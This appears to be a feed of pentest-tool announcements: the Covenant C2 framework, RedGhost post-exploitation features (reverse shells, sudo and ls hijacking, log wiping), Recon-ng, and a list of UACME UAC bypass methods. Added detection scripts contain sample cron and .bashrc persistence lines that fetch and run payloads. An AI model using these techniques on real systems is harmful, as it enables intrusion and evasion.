Covenant – A .NET Command And Control Framework For Red Teamers

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.

Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.

Quick-Start Guide

Please see the Installation and Startup guide to get started with Covenant! The Wiki documents most of Covenant's core features and how to use them.

Features

Covenant has several key features that make it useful and differentiate it from other command and control frameworks:

- Intuitive Interface – Covenant provides an intuitive web application to easily run a collaborative red team operation.
- Multi-Platform – Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has Docker support, allowing it to run within a container on any system that has Docker installed.
- Multi-User – Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
- API Driven – Covenant is driven by an API that enables multi-user collaboration and is easily extensible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
- Listener Profiles – Covenant supports listener "profiles" that control how the network communication between Grunt implants and Covenant listeners looks on the wire.
- Encrypted Key Exchange – Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy for traffic between Grunt implants and Covenant listeners.
- Dynamic Compilation – Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
- Inline C# Execution – Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
- Tracking Indicators – Covenant tracks "indicators" throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in its infancy and still has room for improvement.
- Developed in C# – Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I've found it very convenient to write the server, client, and implant all in the same language. This may not be a true "feature", but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion

Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.

Download Covenant

Link: http://feedproxy.google.com/~r/PentestTools/~3/FRnRVXGYQT8/covenant-net-command-and-control.html

DockerSecurityPlayground – A Microservices-based Framework For The Study Of Network Security And Penetration Test Techniques

Docker Security Playground is an application that allows you to:

- Create network and network security scenarios, in order to understand network protocols, rules, and security issues, by installing DSP on your PC.
- Learn penetration testing techniques by simulating vulnerability lab scenarios.
- Manage a set of docker-compose projects.

The main goal of DSP is to learn penetration testing and network security, but its flexibility allows the creation, graphical editing and run/stop management of all your docker-compose labs. For more information look at the Labs Management page.

DSP Features

- Graphic editor of docker-compose
- Docker image management
- GIT integration
- DSP repository with a set of network security scenarios

How can I share my labs with the world?

During the installation you can create a local environment that has no link with git, or you can associate a personal repository with the application. This is very useful if you want to share your work with other people.

A DSP repository must meet several requirements, so I have created a base DSP Repo Template that you can use to create your personal repository. So, the easiest way to share labs is the following:

1. Fork the DSP_Repo project: https://github.com/giper45/DSP_Repo.git
2. During the installation, set the github directory param to your forked repository.
3. Now create your labs and share them!

It is important that all images that you use are available to other users, so:

- You can publish on Docker Hub so other users can pull your images in order to use your labs.
- You can provide Dockerfiles inside the .docker-images directory, so users can use build.sh to build your images and use your repo.

If you need a "private way" to share labs you should share the repository in other ways; at the current time there is no support for sharing private repositories.

In DSP you can manage multiple user repositories (Repositories tab).

Prerequisites

- Nodejs (v7 or later)
- git
- docker
- docker-compose
- compiler tools (g++, c, c++)

Installation

Install the prerequisites and run:

npm install

Troubleshooting during installation

If you have an error regarding the node-pty module, try to:

- Install build-essential (in Ubuntu: apt install -y build-essential)
- Use Node.js LTS (node-pty has some issues, as shown here)

Update the application

When you update the application it is important to update the npm packages (the application uses mydockerjs, an npm docker API that I am developing during DSP development: https://www.npmjs.com/package/mydockerjs):

npm run update

Start

Run

npm start

to start the application. This will launch a server listening on port 8080 (or another port if you have set the ENV variable in the index.js file) of your localhost. Open your favourite browser and go to localhost:8080. You'll be redirected to the installation page; set the parameters and click install.

Documentation

For documentation about DSP usage go to the Wiki pages:

- Main Page: http://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/home
- User Guide: http://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/user_guide
- Docker Wrapper Image: http://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/dsp_wrapper_image

It is a little outdated, I will update it as soon as possible!

Docker Wrapper Image

DSP implements a label convention called DockerWrapperImage that allows you to create images that expose actions to execute when a lab is running. Look at the doc.

Error Debug

MacOS ECONNRESET error:

events.js:183
    throw er; // Unhandled 'error' event
    ^
Error: read ECONNRESET
    at _errnoException (util.js:992:11)
    at TCP.onread (net.js:618:25)

On Mac it seems that there is some problem with some node package, so in order to solve this run:

npm install ws@3.3.2 --save-dev --save-exact

Other info here: http://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/docker-operation-errors

Contributing

1. Fork it!
2. Create your feature branch: git checkout -b my-new-feature
3. Commit your changes: git commit -am 'Add some feature'
4. Push to the branch: git push origin my-new-feature
5. Submit a pull request; we'll check it.

Any Questions?

Use the Issues in order to ask everything you want!

Links

- DSP Vagrant Box used in Blackhat Session
- Blackhat scenario in Gitlab

Relevant DSP Repositories

- https://github.com/giper45/DSP_Projects.git : Official DSP Repository
- https://github.com/giper45/DSP_Repo.git : DSP template to create another repository: fork it to start creating your personal remote environment
- https://github.com/NS-unina/DSP_Repo.git : Repository created for the Network Security Course of Simon Pietro Romano at the University of Naples Federico II

Contributors

- Technical support: Gaetano Perrone, Francesco Caturano
- Documentation support: Gaetano Perrone, Francesco Caturano
- Application design: Gaetano Perrone, Simon Pietro Romano
- Application development: Gaetano Perrone, Francesco Caturano
- Docker wrapper image development: Gaetano Perrone, Francesco Caturano

Thanks to Giuseppe Criscuolo for the logo design.

Changelog

Go to CHANGELOG.md to see all the version changes.

Download DockerSecurityPlayground

Link: http://feedproxy.google.com/~r/PentestTools/~3/SB-rKad-N3A/dockersecurityplayground-microservices.html

RedGhost v3.0 – Linux Post Exploitation Framework Written In Bash Designed To Assist Red Teams In Persistence, Reconnaissance, Privilege Escalation And Leaving No Trace

Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.

- Payloads – Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
- SudoInject – Function to inject the "sudo" command with a wrapper function that runs a reverse root shell every time "sudo" is run, for privilege escalation
- lsInject – Function to inject the "ls" command with a wrapper function that runs the payload every time "ls" is run, for persistence
- SSHKeyInject – Function to log keystrokes of an ssh process using strace
- Crontab – Function to create a cron job that downloads the payload from a remote server and runs it every minute, for persistence
- SysTimer – Function to create a systemd timer that downloads and executes the payload every 30 seconds, for persistence
- GetRoot – Function to try various methods to escalate privileges
- Clearlogs – Function to clear logs and make forensic investigation difficult
- MassInfoGrab – Function to grab mass reconnaissance/information on the system
- CheckVM – Function to check if the system is a virtual machine
- MemoryExec – Function to execute a remote bash script in memory
- BanIp – Function to ban an IP using iptables

Installation

One-liner to install RedGhost:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One-liner to install prerequisites and RedGhost:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; apt-get install strace; ./redghost.sh

Prerequisites

dialog, gcc, iptables, strace

Download RedGhost
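What the SudoInject and lsInject wrappers described above look like once written into a shell rc file, beside a check that lists them. This is an added example, not code from RedGhost (the post does not show its source); the sample .bashrc, the payload path /tmp/.x/payload.sh and the function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not RedGhost's code): a SudoInject/lsInject-style wrapper as
# it appears in ~/.bashrc, and a check that lists such wrappers. The sample
# file and the payload path /tmp/.x/payload.sh are assumptions for illustration.

# Write a constructed ~/.bashrc to a temp file and print its path. Lines 4
# and 5 are the injected wrappers: the payload is started in the background,
# then the real command runs via "command" so the victim notices nothing.
make_sample_rc() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# ~/.bashrc (constructed sample)
alias ll='ls -alF'
mkcd() { mkdir -p "$1" && cd "$1"; }
sudo() { /tmp/.x/payload.sh >/dev/null 2>&1 & command sudo "$@"; }
function ls { /tmp/.x/payload.sh >/dev/null 2>&1 & command ls "$@"; }
EOF
  printf '%s\n' "$f"
}

# Commands worth wrapping from an attacker's view: run often, or run as root.
WRAPPED_TARGETS='sudo|ls|ssh|su|cd|cat'

# Print "<file>:<line>:<kind>:<name>" for every definition that shadows one
# of the targets, matching "name() {", "function name {" and "alias name=".
find_wrappers() {
  rc="$1"
  # grep exits 1 when nothing matches; the pipeline's status is the loop's,
  # so a caller running under "set -e" is not aborted by a clean file.
  grep -nE "^[[:space:]]*(function[[:space:]]+($WRAPPED_TARGETS)[[:space:]]*\(?\)?[[:space:]]*\{|($WRAPPED_TARGETS)[[:space:]]*\(\)[[:space:]]*\{|alias[[:space:]]+($WRAPPED_TARGETS)=)" "$rc" 2>/dev/null |
  while IFS=: read -r lineno text; do
    name=$(printf '%s' "$text" | sed -E 's/^[[:space:]]*(function[[:space:]]+|alias[[:space:]]+)?([a-z]+).*/\2/')
    if printf '%s' "$text" | grep -qE '^[[:space:]]*alias[[:space:]]'; then
      kind=alias
    else
      kind=function
    fi
    printf '%s:%s:%s:%s\n' "$rc" "$lineno" "$kind" "$name"
  done
  return 0
}

# Number of findings in one file; the value an audit script would act on.
count_wrappers() {
  find_wrappers "$1" | wc -l | tr -d ' '
}

# Check the files a login or interactive shell actually sources for this user.
audit_user_rc_files() {
  for f in "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" \
           "$HOME/.zshrc" /etc/bash.bashrc /etc/profile; do
    [ -r "$f" ] && find_wrappers "$f"
  done
  return 0
}
```

A legitimate `ls() { command ls --color=auto "$@"; }` is reported too: the check lists candidates, so inspect each body for a backgrounded command, a network client or a hidden path before acting on it. On a live host, run audit_user_rc_files for each user whose home directory is readable.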

Link: http://feedproxy.google.com/~r/PentestTools/~3/r5pc37rjXcE/redghost-v30-linux-post-exploitation.html

Recon-ng v5.0.0 – Open Source Intelligence Gathering Tool Aimed At Reducing The Time Spent Harvesting Information From Open Sources

Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open-source web-based reconnaissance quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Wiki to get started.

Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. See the Development Guide for more information on building and maintaining modules.

Download Recon-Ng

Link: http://feedproxy.google.com/~r/PentestTools/~3/aJ03REwtdTs/recon-ng-v500-open-source-intelligence.html

RedGhost v2.0 – Linux Post Exploitation Framework Designed To Assist Red Teams In Gaining Persistence, Reconnaissance And Leaving No Trace

Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.

- Payloads – Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
- SudoInject – Function to inject the "sudo" command with a wrapper function that runs a reverse root shell every time "sudo" is run, for privilege escalation
- lsInject – Function to inject the "ls" command with a wrapper function that runs the payload every time "ls" is run, for persistence
- Crontab – Function to create a cron job that downloads the payload from a remote server and runs it every minute, for persistence
- GetRoot – Function to try various methods to escalate privileges
- Clearlogs – Function to clear logs and make forensic investigation difficult
- MassInfoGrab – Function to grab mass reconnaissance/information on the system
- BanIp – Function to ban an IP using iptables

Installation

One-liner to install RedGhost:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One-liner to install prerequisites and RedGhost:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; ./redghost.sh

Prerequisites

dialog, gcc, iptables

Download RedGhost
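An added example for the Crontab and MemoryExec features, as described in this post and in the RedGhost v3.0 post above: a constructed crontab containing the "download the payload from a remote server and run it every minute" entry next to ordinary jobs, and a check that classifies each entry. This is not RedGhost's code; the sample crontab, the address 203.0.113.7 (a documentation range) and the function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not RedGhost's code): the "download the payload and run it
# every minute" cron persistence described in the post, and a check that
# classifies crontab entries. The sample crontab, the address 203.0.113.7
# (documentation range) and the function names are this example's assumptions.

# Write a constructed crontab to a temp file and print its path. Entries 4
# and 5 are the persistence jobs; the others are ordinary.
make_sample_crontab() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# m h dom mon dow command   (constructed sample)
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /opt/backup/run.sh
* * * * * wget -q -O- http://203.0.113.7/p.sh | bash
* * * * * curl -fsSL http://203.0.113.7/p.sh -o /tmp/.p && bash /tmp/.p
@reboot /home/ops/.local/bin/agent
EOF
  printf '%s\n' "$f"
}

# Classify one crontab line. Prints a comma-separated list of reasons, or
# nothing for blank lines, comments and entries that look ordinary.
classify_cron_entry() {
  line="$1"
  reasons=""
  case "$line" in
    ''|'#'*) return 0 ;;
  esac
  # Five literal asterisks: the job fires every minute.
  case "$line" in
    '* * * * *'*) reasons="every-minute" ;;
  esac
  # curl or wget in the command part: the job pulls something from the network.
  if printf '%s' "$line" | grep -qE '(^|[[:space:];&|])(curl|wget)[[:space:]]'; then
    reasons="${reasons:+$reasons,}remote-fetch"
  fi
  # Output piped straight into a shell, or a file under /tmp run by a shell.
  if printf '%s' "$line" | grep -qE '\|[[:space:]]*(ba)?sh([[:space:]]|$)|(ba)?sh[[:space:]]+/tmp/'; then
    reasons="${reasons:+$reasons,}exec-from-download"
  fi
  # Dot-directories or dot-files in the command path (low severity on its own).
  if printf '%s' "$line" | grep -qE '/\.[A-Za-z0-9_]'; then
    reasons="${reasons:+$reasons,}hidden-path"
  fi
  [ -n "$reasons" ] && printf '%s\n' "$reasons"
  return 0
}

# Print "<line>:<reasons>" for every flagged entry in a crontab file.
scan_crontab() {
  n=0
  while IFS= read -r line || [ -n "$line" ]; do
    n=$((n + 1))
    r=$(classify_cron_entry "$line")
    [ -n "$r" ] && printf '%s:%s\n' "$n" "$r"
  done < "$1"
  return 0
}

# Run the scan over the crontabs that actually exist on a Debian-style host.
audit_system_crontabs() {
  for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*; do
    [ -r "$f" ] && scan_crontab "$f" | sed "s|^|$f:|"
  done
  return 0
}
```

The every-minute schedule alone is not proof of anything, and a dot-directory such as ~/.local/bin is common; the combination every-minute plus remote-fetch plus exec-from-download is the pattern the post describes and is what an alert should key on. Per-user crontabs require root to read, so run audit_system_crontabs as root.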

Link: http://feedproxy.google.com/~r/PentestTools/~3/VgaanjAU6kw/redghost-v20-linux-post-exploitation.html

UACME – Defeating Windows User Account Control

Defeating Windows User Account Control by abusing the built-in Windows AutoElevate backdoor.

System Requirements

x86-32/x64 Windows 7/8/8.1/10 (client; some methods, however, work on server versions too).
Admin account with UAC set to default settings required.

Usage

Run the executable from the command line: akagi32 [Key] [Param] or akagi64 [Key] [Param]. See "Run examples" below for more info.

The first param is the number of the method to use; the second is an optional command (executable file name including full path) to run. The second param can be empty; in this case the program will execute an elevated cmd.exe from the system32 folder.

Keys (watch debug output with dbgview or similar for more info):

1. Author: Leo Davidson; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe; Component(s): cryptbase.dll; Implementation: ucmStandardAutoElevation
   Works from: Windows 7 (7600); Fixed in: Windows 8.1 (9600); How: sysprep.exe hardened LoadFrom manifest elements

2. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe; Component(s): ShCore.dll; Implementation: ucmStandardAutoElevation
   Works from: Windows 8.1 (9600); Fixed in: Windows 10 TP (> 9600); How: Side effect of ShCore.dll moving to \KnownDlls

3. Author: Leo Davidson derivative by WinNT/Pitou; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\oobe\setupsqm.exe; Component(s): WdsCore.dll; Implementation: ucmStandardAutoElevation
   Works from: Windows 7 (7600); Fixed in: Windows 10 TH2 (10558); How: Side effect of OOBE redesign

4. Author: Jon Ericson, WinNT/Gootkit, mzH; Type: AppCompat; Method: RedirectEXE Shim
   Target(s): \system32\cliconfg.exe; Component(s): -; Implementation: ucmShimRedirectEXE
   Works from: Windows 7 (7600); Fixed in: Windows 10 TP (> 9600); How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for the rest of Windows versions

5. Author: WinNT/Simda; Type: Elevated COM interface; Method: ISecurityEditor
   Target(s): HKLM registry keys; Component(s): -; Implementation: ucmSimdaTurnOffUac
   Works from: Windows 7 (7600); Fixed in: Windows 10 TH1 (10147); How: ISecurityEditor interface method changed

6. Author: Win32/Carberp; Type: Dll Hijack; Method: WUSA
   Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe; Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll; Implementation: ucmWusaMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 TH1 (10147); How: WUSA /extract option removed

7. Author: Win32/Carberp derivative; Type: Dll Hijack; Method: WUSA
   Target(s): \system32\cliconfg.exe; Component(s): ntwdblib.dll; Implementation: ucmWusaMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 TH1 (10147); How: WUSA /extract option removed

8. Author: Leo Davidson derivative by Win32/Tilon; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe; Component(s): Actionqueue.dll; Implementation: ucmStandardAutoElevation
   Works from: Windows 7 (7600); Fixed in: Windows 8.1 (9600); How: sysprep.exe hardened LoadFrom manifest

9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative; Type: Dll Hijack; Method: IFileOperation, ISecurityEditor, WUSA
   Target(s): IFEO registry keys, \system32\cliconfg.exe; Component(s): Attacker defined Application Verifier Dll; Implementation: ucmAvrfMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 TH1 (10147); How: WUSA /extract option removed, ISecurityEditor interface method changed

10. Author: WinNT/Pitou, Win32/Carberp derivative; Type: Dll Hijack; Method: IFileOperation, WUSA
   Target(s): \system32\{New}or{Existing}\{autoelevated}.exe, e.g. winsat.exe; Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll; Implementation: ucmWinSATMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 TH2 (10548); How: AppInfo elevated application path control hardening

11. Author: Jon Ericson, WinNT/Gootkit, mzH; Type: AppCompat; Method: Shim Memory Patch
   Target(s): \system32\iscsicli.exe; Component(s): Attacker prepared shellcode; Implementation: ucmShimPatch
   Works from: Windows 7 (7600); Fixed in: Windows 8.1 (9600); How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for the rest of Windows versions

12. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe; Component(s): dbgcore.dll; Implementation: ucmStandardAutoElevation
   Works from: Windows 10 TH1 (10240); Fixed in: Windows 10 TH2 (10565); How: sysprep.exe manifest updated

13. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\mmc.exe EventVwr.msc; Component(s): elsext.dll; Implementation: ucmMMCMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS1 (14316); How: Missing dependency removed

14. Author: Leo Davidson, WinNT/Sirefef derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\credwiz.exe, \system32\wbem\oobe.exe; Component(s): netutils.dll; Implementation: ucmSirefefMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 TH2 (10548); How: AppInfo elevated application path control hardening

15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\cliconfg.exe; Component(s): ntwdblib.dll; Implementation: ucmGenericAutoelevation
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS1 (14316); How: Cliconfg.exe autoelevation removed

16. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe; Component(s): SLC.dll; Implementation: ucmGWX
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS1 (14316); How: AppInfo elevated application path control and inetmgr executable hardening

17. Author: Leo Davidson derivative; Type: Dll Hijack (Import forwarding); Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe; Component(s): unbcl.dll; Implementation: ucmStandardAutoElevation2
   Works from: Windows 8.1 (9600); Fixed in: Windows 10 RS1 (14371); How: sysprep.exe manifest updated

18. Author: Leo Davidson derivative; Type: Dll Hijack (Manifest); Method: IFileOperation
   Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest); Component(s): Attacker defined; Implementation: ucmAutoElevateManifest
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS1 (14371); How: Manifest parsing logic reviewed

19. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\inetsrv\inetmgr.exe; Component(s): MsCoree.dll; Implementation: ucmInetMgrMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS1 (14376); How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images

20. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\mmc.exe, Rsop.msc; Component(s): WbemComn.dll; Implementation: ucmMMCMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS3 (16232); How: Target requires wbemcomn.dll to be signed by MS

21. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation, SxS DotLocal
   Target(s): \system32\sysprep\sysprep.exe; Component(s): comctl32.dll; Implementation: ucmSXSMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS3 (16232); How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images

22. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation, SxS DotLocal
   Target(s): \system32\consent.exe; Component(s): comctl32.dll; Implementation: ucmSXSMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

23. Author: Leo Davidson derivative; Type: Dll Hijack; Method: IFileOperation
   Target(s): \system32\pkgmgr.exe; Component(s): DismCore.dll; Implementation: ucmDismMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

24. Author: BreakingMalware; Type: Shell API; Method: Environment variables expansion
   Target(s): \system32\CompMgmtLauncher.exe; Component(s): Attacker defined; Implementation: ucmCometMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS2 (15031); How: CompMgmtLauncher.exe autoelevation removed

25. Author: Enigma0x3; Type: Shell API; Method: Registry key manipulation
   Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe; Component(s): Attacker defined; Implementation: ucmHijackShellCommandMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS2 (15031); How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed

26. Author: Enigma0x3; Type: Race Condition; Method: File overwrite
   Target(s): %temp%\GUID\dismhost.exe; Component(s): LogProvider.dll; Implementation: ucmDiskCleanupRaceCondition
   Works from: Windows 10 TH1 (10240), AlwaysNotify compatible; Fixed in: Windows 10 RS2 (15031); How: File security permissions altered

27. Author: ExpLife; Type: Elevated COM interface; Method: IARPUninstallStringLauncher
   Target(s): Attacker defined; Component(s): Attacker defined; Implementation: ucmUninstallLauncherMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS3 (16199); How: UninstallStringLauncher interface removed from COMAutoApprovalList

28. Author: Exploit/Sandworm; Type: Whitelisted component; Method: InfDefaultInstall
   Target(s): Attacker defined; Component(s): Attacker defined; Implementation: ucmSandwormMethod
   Works from: Windows 7 (7600); Fixed in: Windows 8.1 (9600); How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)

29. Author: Enigma0x3; Type: Shell API; Method: Registry key manipulation
   Target(s): \system32\sdclt.exe; Component(s): Attacker defined; Implementation: ucmAppPathMethod
   Works from: Windows 10 TH1 (10240); Fixed in: Windows 10 RS3 (16215); How: Shell API update

30. Author: Leo Davidson derivative, lhc645; Type: Dll Hijack; Method: WOW64 logger
   Target(s): \syswow64\{any elevated exe, e.g. wusa.exe}; Component(s): wow64log.dll; Implementation: ucmWow64LoggerMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

31. Author: Enigma0x3; Type: Shell API; Method: Registry key manipulation
   Target(s): \system32\sdclt.exe; Component(s): Attacker defined; Implementation: ucmSdcltIsolatedCommandMethod
   Works from: Windows 10 TH1 (10240); Fixed in: Windows 10 RS4 (17025); How: Shell API / Windows components update

32. Author: xi-tauw; Type: Dll Hijack; Method: UIPI bypass with uiAccess application
   Target(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exe; Component(s): duser.dll, osksupport.dll; Implementation: ucmUiAccessMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

33. Author: winscripting.blog; Type: Shell API; Method: Registry key manipulation
   Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe; Component(s): Attacker defined; Implementation: ucmMsSettingsDelegateExecuteMethod
   Works from: Windows 10 TH1 (10240); Fixed in: unfixed; How: -

34. Author: James Forshaw; Type: Shell API; Method: Environment variables expansion
   Target(s): \system32\svchost.exe via \system32\schtasks.exe; Component(s): Attacker defined; Implementation: ucmDiskCleanupEnvironmentVariable
   Works from: Windows 8.1 (9600), AlwaysNotify compatible; Fixed in: unfixed; How: -

35. Author: CIA & James Forshaw; Type: Impersonation; Method: Token Manipulations
   Target(s): Autoelevated applications; Component(s): Attacker defined; Implementation: ucmTokenModification
   Works from: Windows 7 (7600), AlwaysNotify compatible (see note); Fixed in: Windows 10 RS5 (17686); How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added

36. Author: Thomas Vanhoutte aka SandboxEscaper; Type: Race condition; Method: NTFS reparse point & Dll Hijack
   Target(s): wusa.exe; Component(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dll; Implementation: ucmJunctionMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

37. Author: Ernesto Fernandez, Thomas Vanhoutte; Type: Dll Hijack; Method: SxS DotLocal, NTFS reparse point
   Target(s): \system32\dccw.exe; Component(s): GdiPlus.dll; Implementation: ucmSXSDccwMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

38. Author: Clement Rouault; Type: Whitelisted component; Method: APPINFO command line spoofing
   Target(s): \system32\mmc.exe; Component(s): Attacker defined; Implementation: ucmHakrilMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

39. Author: Stefan Kanthak; Type: Dll Hijack; Method: .NET Code Profiler
   Target(s): \system32\mmc.exe; Component(s): Attacker defined; Implementation: ucmCorProfilerMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

40. Author: Ruben Boonen; Type: COM Handler Hijack; Method: Registry key manipulation
   Target(s): \system32\mmc.exe, \System32\recdisc.exe; Component(s): Attacker defined; Implementation: ucmCOMHandlersMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 19H1 (18362); How: Side effect of Windows changes

41. Author: Oddvar Moe; Type: Elevated COM interface; Method: ICMLuaUtil
   Target(s): Attacker defined; Component(s): Attacker defined; Implementation: ucmCMLuaUtilShellExecMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

42. Author: BreakingMalware and Enigma0x3; Type: Elevated COM interface; Method: IFwCplLua
   Target(s): Attacker defined; Component(s): Attacker defined; Implementation: ucmFwCplLuaMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS4 (17134); How: Shell API update

43. Author: Oddvar Moe derivative; Type: Elevated COM interface; Method: IColorDataProxy, ICMLuaUtil
   Target(s): Attacker defined; Component(s): Attacker defined; Implementation: ucmDccwCOMMethod
   Works from: Windows 7 (7600); Fixed in: unfixed; How: -

44. Author: bytecode77; Type: Shell API; Method: Environment variables expansion
   Target(s): Multiple auto-elevated processes; Component(s): Various per target; Implementation: ucmVolatileEnvMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS3 (16299); How: Current user system directory variables ignored during process creation

45. Author: bytecode77; Type: Shell API; Method: Registry key manipulation
   Target(s): \system32\slui.exe; Component(s): Attacker defined; Implementation: ucmSluiHijackMethod
   Works from: Windows 8.1 (9600); Fixed in: unfixed; How: -

46. Author: Anonymous; Type: Race Condition; Method: Registry key manipulation
   Target(s): \system32\BitlockerWizardElev.exe; Component(s): Attacker defined; Implementation: ucmBitlockerRCMethod
   Works from: Windows 7 (7600); Fixed in: Windows 10 RS4 (>16299); How: Shell API update

47. Author: clavoillotte & 3gstudent; Type: COM Handler Hijack; Method: Registry key manipulation
   Target(s): \system32\mmc.exe; Component(s): Attacker defined; Implementation: ucmCOMHandlersMethod2
   Works from: Windows 7 (7600); Fixed in: Windows 10 19H1 (18362); How: Side effect of Windows changes

48. Author: deroko; Type: Elevated COM interface; Method: ISPPLUAObject
